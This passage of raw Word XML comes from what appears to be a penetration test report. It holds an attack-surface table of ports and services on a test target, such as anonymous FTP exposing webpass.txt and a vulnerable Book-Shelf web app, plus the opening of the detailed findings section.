              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1214E0EF" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Screenshot capture of key commands, HTTP requests/responses, and source code confirming each finding.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B450D72" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. Attack Surface Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5321AE79" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The table below summarizes the network-facing services identified on the target during service enumeration.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4"/>
        <w:gridCol w:w="1303"/>
        <w:gridCol w:w="2289"/>
        <w:gridCol w:w="2852"/>
        <w:gridCol w:w="1822"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C64CEA" w14:paraId="548F91AC" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E2F2CB3" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1450" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02D2B994" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6926217A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76DF46CC" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Security Observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EABEC27" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="593BF2DE" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22D456EB" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>21/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1450" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47172A45" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EBD7C0C" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3.0.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="264CB02D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Anonymous login enabled; exposes webpass.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="670F83B0" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confirmed vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="4990A208" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BE1191F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>22/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1450" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="358D985F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="141B53C0" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OpenSSH 7.9p1 (Debian 10+deb10u2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77689B0D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No authentication weaknesses identified during testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03114BAB" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open — no issue confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="5365F92D" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CA4EE9D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>80/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1450" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E62E87B" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="637DA2A7" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Apache 2.4.38 (Debian)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65D5D721" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hosts vulnerable Book-Shelf web application (see Section 5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57AAED7F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confirmed vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="3EA3A71A" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A151D99" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3306/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1450" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="671D3FC9" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6824ED9D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MySQL (unauthorized)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BBC99F1" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reachable from attacker host; authentication required and enforced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D6AA0B2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exposed, not compromised</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="66C21C3A" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="274E7381" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>33060/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1450" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07B1D44A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MySQL X Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C29C5BE" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MySQL X protocol listener</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7993DFF7" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reachable from attacker host; no further access attempted/achieved</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3903EDAF" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exposed, not compromised</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FC1CC1D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00C64CEA">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C055B9" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>An open port alone does not constitute a vulnerability; each service above was assessed individually, and the security observation column reflects only what was verified during testing (see Section 5 for confirmed findings and Section 9 of the Appendix for tests that did not yield exploitable results).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A53DDF" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F437F89" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This section documents each confirmed vulnerability identified during testing. Findings are rated using the following severity scale, consistent with typical industry practice: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C64CEA" w14:paraId="0D58A0B7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B807759" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
